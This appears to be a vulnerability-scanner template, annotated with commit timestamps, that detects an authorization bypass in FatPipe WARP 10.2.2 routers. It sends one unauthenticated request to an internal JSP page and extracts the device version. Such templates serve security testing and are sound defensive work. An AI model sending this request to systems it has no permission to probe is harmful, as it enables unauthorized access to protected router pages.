2021-09-30 11:48:21 +00:00
id : fatpipe-auth-bypass
2021-09-30 02:07:24 +00:00
info :
2022-10-19 21:11:27 +00:00
name : FatPipe WARP 10.2.2 - Authorization Bypass
2021-09-30 02:07:24 +00:00
author : gy741
severity : high
2022-10-19 21:11:27 +00:00
description : FatPipe WARP 10.2.2 contains an authorization bypass vulnerability. Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result, an attacker can bypass proper authorization and access resources behind protected pages.
2021-09-30 02:07:24 +00:00
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
2021-09-30 11:48:21 +00:00
- https://www.fatpipeinc.com/support/advisories.php
2021-09-30 02:07:24 +00:00
tags : fatpipe,auth-bypass,router
requests :
- raw :
- |
GET /fpui/jsp/index.jsp HTTP/1.1
Host : {{Hostname}}
Accept : */*
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "productType"
- "type:"
- "version:"
2021-09-30 11:48:21 +00:00
- "<title>FatPipe Networks</title>"
2021-09-30 02:07:24 +00:00
condition : and
2021-09-30 11:48:21 +00:00
extractors :
- type : regex
part : body
regex :
- 'version : "([0-9.a-z]+)" '
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/19